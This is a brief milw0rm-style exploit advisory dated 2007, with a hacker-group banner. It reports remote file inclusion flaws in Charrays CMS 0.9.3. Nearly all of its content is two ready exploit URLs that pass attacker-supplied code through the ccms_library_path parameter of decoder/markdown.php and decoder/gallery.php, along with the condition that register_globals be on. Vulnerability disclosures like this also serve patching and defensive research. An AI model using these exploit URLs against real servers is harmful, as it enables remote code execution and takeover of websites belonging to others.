1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 ____ __________ __ ____ __
3 /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
4 | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
5 | | | \ | |/ \ \___| | /_____/ | || |
6 |___|___| /\__| /______ /\___ >__| |___||__|
7 \/\______| \/ \/
8 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
9
10 Http://www.inj3ct−it.org
Staff[at]inj3ct−it[dot]org
11
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13
14
Multiple Remote File Inclusion
15
16 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
17
18 # Author: MhZ91 nobody.91@hotmail.it
19
20 # Download Script: http://sourceforge.net/projects/charray−cms
21
22 # register_globals = On
23
24 # Exploit
25
26 # http://[site]/[path]/decoder/markdown.php?ccms_library_path=[Evil_Code]
27
28 # http://[site]/[path]/decoder/gallery.php?ccms_library_path=[Evil_Code]
29
30 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
31
32 # milw0rm.com [2007−11−28]
Page 1/1
Charrays CMS 0.9.3 Multiple Remote File Inclusion Vulnerabilities
MhZ91
11/28/2007